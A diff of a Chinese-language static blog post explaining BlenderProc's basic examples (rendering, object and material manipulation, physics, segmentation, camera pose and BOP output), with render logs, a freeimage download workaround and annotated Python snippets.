Error while fetching file: The read operation timed out.
Error while fetching file: <urlopen error timed out>.
Error while fetching file: <urlopen error timed out>.
+
1
2
3
4
5
6
7
It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
Gonna try to download it automatically.
Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
Error while fetching file: <urlopen error timed out>.
Error while fetching file: The read operation timed out.
Error while fetching file: <urlopen error timed out>.
Error while fetching file: <urlopen error timed out>.

我设了个全局代理和 TUN 模式再多跑几次就可以了 orz

png

这么看从网上下载 freeimage-3.15.1-win64.dll,然后放到 C:\Users\XXXX\AppData\Local\imageio\freeimage\ 下也是可以的!

-
File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
-
Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
Selecting render devices...
Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
Timer 'OBJ_import' took 1.5ms
Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

...

Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
Time: 00:01.36 (Saving: 00:00.30)

Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

...

Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
Time: 00:00.86 (Saving: 00:00.01)

Merging data for frame 0 into examples/basics/basic/output\0.hdf5
Merging data for frame 1 into examples/basics/basic/output\1.hdf5

Blender quit
Cleaning temporary directory
+
1
File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
Selecting render devices...
Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
Timer 'OBJ_import' took 1.5ms
Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

...

Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
Time: 00:01.36 (Saving: 00:00.30)

Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

...

Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
Time: 00:00.86 (Saving: 00:00.01)

Merging data for frame 0 into examples/basics/basic/output\0.hdf5
Merging data for frame 1 into examples/basics/basic/output\1.hdf5

Blender quit
Cleaning temporary directory

Visualization

-
blenderproc vis hdf5 examples/basics/basic/output/0.hdf5
+
1
blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

渲染了 colors、depth、normals 三张图片:

png

Code

@@ -449,17 +447,17 @@

Code

-
import blenderproc as bproc
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
args = parser.parse_args()
+
1
2
3
4
5
6
7
8
import blenderproc as bproc
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
args = parser.parse_args()

初始化 blenderproc:

-
bproc.init()
+
1
bproc.init()

args.scene 中载入模型场景:

-
objs = bproc.loader.load_obj(args.scene)
+
1
objs = bproc.loader.load_obj(args.scene)

载入灯光:

-
# define a light and set its location and energy level
light = bproc.types.Light()
light.set_type("POINT")
light.set_location([5, -5, 5])
light.set_energy(1000)
+
1
2
3
4
5
# define a light and set its location and energy level
light = bproc.types.Light()
light.set_type("POINT")
light.set_location([5, -5, 5])
light.set_energy(1000)

载入相机:这段代码的作用是设置相机分辨率,并读取相机位置信息并转换为齐次相机-世界变换矩阵。

-
# define the camera resolution
# 首先,调用 bproc.camera.set_resolution() 函数来定义相机的分辨率,该函数接受两个参数,即相机图像的宽度和高度。在这个示例中,我们将相机分辨率设置为 512x512。
bproc.camera.set_resolution(512, 512)

# read the camera positions file and convert into homogeneous camera-world transformation
with open(args.camera, "r") as f:
for line in f.readlines():
# 使用一个 for 循环来逐行读取相机位置文件中的信息,并将每个位置信息转换为齐次变换矩阵,并通过调用 bproc.camera.add_camera_pose() 函数将其添加到 BlenderProc 中。
line = [float(x) for x in line.split()]
position, euler_rotation = line[:3], line[3:6]
matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
bproc.camera.add_camera_pose(matrix_world)
+
1
2
3
4
5
6
7
8
9
10
11
12
# define the camera resolution
# 首先,调用 bproc.camera.set_resolution() 函数来定义相机的分辨率,该函数接受两个参数,即相机图像的宽度和高度。在这个示例中,我们将相机分辨率设置为 512x512。
bproc.camera.set_resolution(512, 512)

# read the camera positions file and convert into homogeneous camera-world transformation
with open(args.camera, "r") as f:
for line in f.readlines():
# 使用一个 for 循环来逐行读取相机位置文件中的信息,并将每个位置信息转换为齐次变换矩阵,并通过调用 bproc.camera.add_camera_pose() 函数将其添加到 BlenderProc 中。
line = [float(x) for x in line.split()]
position, euler_rotation = line[:3], line[3:6]
matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
bproc.camera.add_camera_pose(matrix_world)

渲染图像:

-
# activate normal and depth rendering
bproc.renderer.enable_normals_output()
bproc.renderer.enable_depth_output(activate_antialiasing=False)
# bproc.renderer.set_noise_threshold(0.01) # this is the default value

# render the whole pipeline
data = bproc.renderer.render()
+
1
2
3
4
5
6
7
# activate normal and depth rendering
bproc.renderer.enable_normals_output()
bproc.renderer.enable_depth_output(activate_antialiasing=False)
# bproc.renderer.set_noise_threshold(0.01) # this is the default value

# render the whole pipeline
data = bproc.renderer.render()

首先,我们需要启用 blenderproc 生成每张彩色图像的法线和距离。此外,我们设置所需的图像噪声阈值。较低的噪声阈值将减少图像中的噪声,但会增加渲染时间。默认值为 0.01,适用于大多数应用程序。

=>在临时文件夹中创建文件 rgb_0000.pngrgb_0001.png。同时还创建法线和深度图像。

最后,通过调用 light.set_energy(500) 函数,将光源的强度 energy 设置为 500 瓦特,以控制光照亮度。

-
# render the whole pipeline
data = bproc.renderer.render()

# Collect states of all objects
object_states = []
for obj in objs:
object_states.append({
"name": obj.get_name(),
"local2world": obj.get_local2world_mat()
})
# Add states (they are the same for all frames here)
data["object_states"] = [object_states] * bproc.utility.num_frames()

# Collect state of the one light
light_state = {
"name": light.get_name(),
"local2world": light.get_local2world_mat(),
"energy": light.get_energy()
}
# Add states (its the same for all frames here)
data["light_states"] = [light_state] * bproc.utility.num_frames()

# Collect state of the camera at all frames
cam_states = []
for frame in range(bproc.utility.num_frames()):
cam_states.append({
"cam2world": bproc.camera.get_camera_pose(frame),
"cam_K": bproc.camera.get_intrinsics_as_K_matrix()
})
# Adds states to the data dict
data["cam_states"] = cam_states
+
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# render the whole pipeline
data = bproc.renderer.render()

# Collect states of all objects
object_states = []
for obj in objs:
object_states.append({
"name": obj.get_name(),
"local2world": obj.get_local2world_mat()
})
# Add states (they are the same for all frames here)
data["object_states"] = [object_states] * bproc.utility.num_frames()

# Collect state of the one light
light_state = {
"name": light.get_name(),
"local2world": light.get_local2world_mat(),
"energy": light.get_energy()
}
# Add states (its the same for all frames here)
data["light_states"] = [light_state] * bproc.utility.num_frames()

# Collect state of the camera at all frames
cam_states = []
for frame in range(bproc.utility.num_frames()):
cam_states.append({
"cam2world": bproc.camera.get_camera_pose(frame),
"cam_K": bproc.camera.get_intrinsics_as_K_matrix()
})
# Adds states to the data dict
data["cam_states"] = cam_states

这段代码的含义是:

首先,通过调用 bproc.renderer.render() 函数,对当前的场景进行渲染,并将渲染结果存储在 data 变量中。

@@ -519,12 +517,12 @@

Code

Object selection and manipulation

Usage

-
blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output
+
1
blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

Visualization

-
blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5
+
1
blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5

png

Code

-
# load the objects into the scene
objs = bproc.loader.load_obj(args.scene)

# Find object with name Suzanne
suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
# Set its location and rotation
suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
suzanne.set_rotation_euler([1, 1, 0])
+
1
2
3
4
5
6
7
8
# load the objects into the scene
objs = bproc.loader.load_obj(args.scene)

# Find object with name Suzanne
suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
# Set its location and rotation
suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
suzanne.set_rotation_euler([1, 1, 0])

这个示例的重点是使用 BlenderProc 进行过滤操作以及设置对象的旋转和位置。

在此过滤操作中,我们将条件设置为:"name": 'Suzanne',意思是我们想要选择所有满足 obj.name == 'Suzanne' 的对象。在这种情况下,只有一个对象符合要求。如果我们想要选择多个元素,我们可以使用 bproc.filter.by_attr() 函数。这样就可以选择多个对象。

@@ -533,7 +531,7 @@

Code

Material selection and manipulation

Usage

-
blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output
+
1
blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output

Visualization

-
blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5
+
1
blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5

png

-
# Find all materials
materials = bproc.material.collect_all()

# Find the material of the ground object
ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
# Set its displacement based on its base color texture
ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)
+
1
2
3
4
5
6
7
# Find all materials
materials = bproc.material.collect_all()

# Find the material of the ground object
ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
# Set its displacement based on its base color texture
ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

这段代码的作用是:

    @@ -553,7 +551,7 @@

    Visualization

这段代码的目的是修改指定材质的属性,实现更具创意的渲染效果。

-
# Collect all jpg images in the specified directory
images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
for mat in materials:
# Load one random image
image = bpy.data.images.load(filepath=str(random.choice(images)))
# Set it as base color of the current material
mat.set_principled_shader_value("Base Color", image)
+
1
2
3
4
5
6
7
# Collect all jpg images in the specified directory
images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
for mat in materials:
# Load one random image
image = bpy.data.images.load(filepath=str(random.choice(images)))
# Set it as base color of the current material
mat.set_principled_shader_value("Base Color", image)

这段代码的作用是:

    @@ -567,7 +565,7 @@

    Visualization

Physics positioning

Usage

-
blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output
+
1
blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output

Visualization

-
blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5
+
1
blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5

png

Code

-
# Define a function that samples the pose of a given sphere
def sample_pose(obj: bproc.types.MeshObject):
obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
obj.set_rotation_euler(bproc.sampler.uniformSO3())

# Sample the poses of all spheres above the ground without any collisions in-between
bproc.object.sample_poses(
spheres,
sample_pose_func=sample_pose
)
+
1
2
3
4
5
6
7
8
9
10
# Define a function that samples the pose of a given sphere
def sample_pose(obj: bproc.types.MeshObject):
obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
obj.set_rotation_euler(bproc.sampler.uniformSO3())

# Sample the poses of all spheres above the ground without any collisions in-between
bproc.object.sample_poses(
spheres,
sample_pose_func=sample_pose
)

首先,我们定义一个函数,将给定的物体设置为新的姿态。然后,在 bproc.object.sample_poses 函数调用中使用该函数,在每个物体上调用它,然后检查是否与其他物体发生碰撞。这个过程会重复进行,直到所有物体都被放置且没有发生碰撞。

这段代码的作用是:

@@ -588,7 +586,7 @@

Code

这段代码的目的是模拟物体的动态运动过程,以增加渲染效果的真实感。

-
# Make all spheres actively participate in the simulation
# 通过循环遍历所有的球体对象 spheres,调用 obj.enable_rigidbody(active=True) 函数使其能够参与物理仿真。其中 active=True 代表该球体是主动物体,需要施加力和碰撞等物理效应。
for obj in spheres:
obj.enable_rigidbody(active=True)
# The ground should only act as an obstacle and is therefore marked passive.
# To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
# 将地面对象 ground 的 enable_rigidbody 函数的 active 设置为 False,表示它是被动物体,只参与碰撞等物理效应,并调整地面的碰撞形状为 MESH,以便让球体可以掉落到地面的洼地中。
ground.enable_rigidbody(active=False, collision_shape="MESH")

# Run the simulation and fix the poses of the spheres at the end
# 调用 bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1) 函数来运行物理仿真并在结束时固定球体的位置。具体而言,min_simulation_time 和 max_simulation_time 分别指示物理仿真的最小和最大时间(秒),check_object_interval 则指示固定物体位置时检查位置的时间间隔(秒)。在本例中,物理仿真时间介于 4s 和 20s 之间,每秒钟检查一次物体位置并固定。(注意:如果没有启用物理,该函数将不起作用。)
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)
+
1
2
3
4
5
6
7
8
9
10
11
12
# Make all spheres actively participate in the simulation
# 通过循环遍历所有的球体对象 spheres,调用 obj.enable_rigidbody(active=True) 函数使其能够参与物理仿真。其中 active=True 代表该球体是主动物体,需要施加力和碰撞等物理效应。
for obj in spheres:
obj.enable_rigidbody(active=True)
# The ground should only act as an obstacle and is therefore marked passive.
# To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
# 将地面对象 ground 的 enable_rigidbody 函数的 active 设置为 False,表示它是被动物体,只参与碰撞等物理效应,并调整地面的碰撞形状为 MESH,以便让球体可以掉落到地面的洼地中。
ground.enable_rigidbody(active=False, collision_shape="MESH")

# Run the simulation and fix the poses of the spheres at the end
# 调用 bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1) 函数来运行物理仿真并在结束时固定球体的位置。具体而言,min_simulation_time 和 max_simulation_time 分别指示物理仿真的最小和最大时间(秒),check_object_interval 则指示固定物体位置时检查位置的时间间隔(秒)。在本例中,物理仿真时间介于 4s 和 20s 之间,每秒钟检查一次物体位置并固定。(注意:如果没有启用物理,该函数将不起作用。)
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

这段代码的作用是:

  1. 将所有 sphere 对象设置为活动态,通过启用其刚体属性(rigidbody)实现。对于地面来说,将 active 属性设置为 False,这意味着它在场景中是被动的,但可以和其他活动态物体发生交互。此外,我们还使用 MESH 碰撞形状(collision shape)而不是默认的 CONVEX_HULL 碰撞形状来设置 ground 物体的碰撞形状。需要注意的是,在更复杂的用例中使用 mesh 碰撞形状可能会导致性能问题和错误。如果出现这些情况,最好尝试使用 physics_convex_decomposition。
  2. @@ -598,7 +596,7 @@

    Code

    这段代码的目的是模拟物体之间的物理交互和运动过程,以增加渲染效果的真实感。

    Semantic Segmentation

    Usage

    -
    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output
    +
    1
    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output

    Visualization

    -
    blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5
    +
    1
    blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5

    png

    Code

    -
    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)
    +
    1
    2
    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)

    这个代码段加载了 .blend 文件,从文件中仅提取网格对象,而不是提取该 .blend 文件中存储的所有信息。

    需要注意的是,在加载的 .blend 文件中,所有对象都已经设置了属性名称为“category_id”的自定义属性。这可以通过手动执行以下步骤来完成:

    -
    obj.set_cp("category_id", 0)
    -
    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])
    +
    1
    obj.set_cp("category_id", 0)
    +
    1
    2
    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    这个模块可以将任何类型的对象相关信息映射到图像或场景中对象的索引列表。例如,如果你想要将自定义属性 category_id 映射到图像上,可以设置 map_by=["category_id"]。然后,每个像素都会被分配一个现有像素中的对象的自定义属性 category_id。如果它被设置为实例化,每个像素将获得一个场景中对象的 id,这些 id 对于多帧是一致的,这也意味着并不是每个图像中都必须出现所有的 id。

    此外,还可以将其设置为对象类的不同自定义属性或属性,如“name”,这将返回每个对象的名称。这无法保存在图像中,因此需要生成一个额外的字典,附加到最终的 .hdf5 容器中。其中,它将每个实例编号映射到一个名称。如果有不能存储在图像中的键,则必须生成一个实例图像,否则会引发错误消息。

    @@ -621,7 +619,7 @@

    Code

    Camera Object Pose Setting

    Usage

    -
    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    +
    1
    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    @@ -629,7 +627,7 @@

    Usage

    -
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...

    这个 ply 文件包含了一个三角网格模型的数据,其中每行数据表示一个顶点或者一个三角面的信息。下面是文件中的每个部分的解释:

    第一行指定了文件使用的 PLY 文件格式。

    @@ -649,7 +647,7 @@

    Usage

    png

    BOP 数据集形式的输出

    Code

    -
    # Use vertex color for texturing
    for mat in obj.get_materials():
    mat.map_vertex_color()
    # Set pose of object via local-to-world transformation matrix
    obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
    [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
    [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
    [0, 0, 0, 1.0]]
    )
    # Scale 3D model from mm to m
    obj.set_scale([0.001, 0.001, 0.001])
    # Set category id which will be used in the BopWriter
    obj.set_cp("category_id", 1)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    # Use vertex color for texturing
    for mat in obj.get_materials():
    mat.map_vertex_color()
    # Set pose of object via local-to-world transformation matrix
    obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
    [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
    [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
    [0, 0, 0, 1.0]]
    )
    # Scale 3D model from mm to m
    obj.set_scale([0.001, 0.001, 0.001])
    # Set category id which will be used in the BopWriter
    obj.set_cp("category_id", 1)

    这段代码的目的是对加载的模型进行预处理和优化,以便更好地适应后续渲染流程的需要。其中,将材质转换为顶点颜色材质可以减少纹理贴图的计算量,使场景更易于渲染;缩放模型到标准的米(meter)单位可以方便控制场景尺寸及物体之间距离的关系;设置自定义属性可以增加场景元素的分类信息,让后续的分割渲染器能够更好地区分不同的物体。

    -
    # Set intrinsics via K matrix
    # 通过相机矩阵 K 设置相机内参(intrinsics)。
    # K 矩阵包括相机的焦距、主点和畸变参数等,用于描述相机的内部光学特性。函数将 K 矩阵作为参数,同时指定了最终图像的宽度和高度。
    bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
    [0.0, 536.1447, 238.3781],
    [0.0, 0.0, 1.0]], 640, 480
    )
    # Set camera pose via cam-to-world transformation matrix
    # 通过摄像机到世界坐标系的变换矩阵设置相机姿态(pose)。其中,变换矩阵 cam2world 描述了相机坐标系相对于世界坐标系的变换关系。该变换矩阵通常由外部传感器提供,如惯性测量单元(IMU)、GPS 等。
    cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
    ])
    # Change coordinate frame of transformation matrix from OpenCV to Blender coordinates
    # 由于使用的是 OpenCV 坐标系,所以需要将坐标系转换为 Blender 中的坐标系。
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
    bproc.camera.add_camera_pose(cam2world)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # Set intrinsics via K matrix
    # 通过相机矩阵 K 设置相机内参(intrinsics)。
    # K 矩阵包括相机的焦距、主点和畸变参数等,用于描述相机的内部光学特性。函数将 K 矩阵作为参数,同时指定了最终图像的宽度和高度。
    bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
    [0.0, 536.1447, 238.3781],
    [0.0, 0.0, 1.0]], 640, 480
    )
    # Set camera pose via cam-to-world transformation matrix
    # 通过摄像机到世界坐标系的变换矩阵设置相机姿态(pose)。其中,变换矩阵 cam2world 描述了相机坐标系相对于世界坐标系的变换关系。该变换矩阵通常由外部传感器提供,如惯性测量单元(IMU)、GPS 等。
    cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
    ])
    # Change coordinate frame of transformation matrix from OpenCV to Blender coordinates
    # 由于使用的是 OpenCV 坐标系,所以需要将坐标系转换为 Blender 中的坐标系。
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
    bproc.camera.add_camera_pose(cam2world)

    这段代码的目的是对相机的内部光学特性和相对位置进行设置。通过设置相机内参和姿态,可以精确地模拟相机在场景中的位置、朝向,以及捕捉图像时的畸变效果等。这有助于实现更逼真的渲染效果,并提高视觉算法的精度。

    @@ -667,7 +665,7 @@

    Code

  3. 将相机源帧更改为匹配 Blender 帧(这将从 OpenCV 坐标系转换为 Blender 的坐标系)。
  4. 最后,将这个新的相机矩阵添加到位姿中,即可渲染。
  5. -
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)
    +
    1
    2
    3
    4
    5
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

    BOP 数据集是一个公共的工业场景物体姿态估计数据集,包含了 80 个具有挑战性的工业部件,每个部件都有不同的材质、变形、表面纹理和反光性质。BOP 数据集中每个部件都拍摄了数百张带有真实噪声深度信息和 RGB 图像的灰度图。此外,BOP 数据集还提供了每个部件的正式模型,即 CAD 文件,以便将您的方法与 CAD 进行比较。BOP 的主要目的是为评估工业场景物体姿态估计算法提供标准化基准。

    @@ -4537,6 +4535,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-Datasets-auto-generator-based-on-Blender/index.html b/posts/Blender-Datasets-auto-generator-based-on-Blender/index.html index 116f4d6fde..1f193a5e0b 100644 --- a/posts/Blender-Datasets-auto-generator-based-on-Blender/index.html +++ b/posts/Blender-Datasets-auto-generator-based-on-Blender/index.html @@ -44,8 +44,6 @@ - - @@ -409,7 +407,7 @@

    资源

    代码

    Config

    -
    import bpy
    import math, mathutils
    import os, random
    import json
    import numpy as np

    mode = 'train' # FLAGS : train or val
    worldPath = 'pathToYourBackgrounds/'
    objsPath = 'pathToYour3DObjso/'
    imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
    labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
    kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
    kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

    picsNum = 2000
    # Number of objects in a scene
    objsNum = 4
    if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
    cameraLens = 15 # 相机焦距
    img_w = 960
    img_h = 540
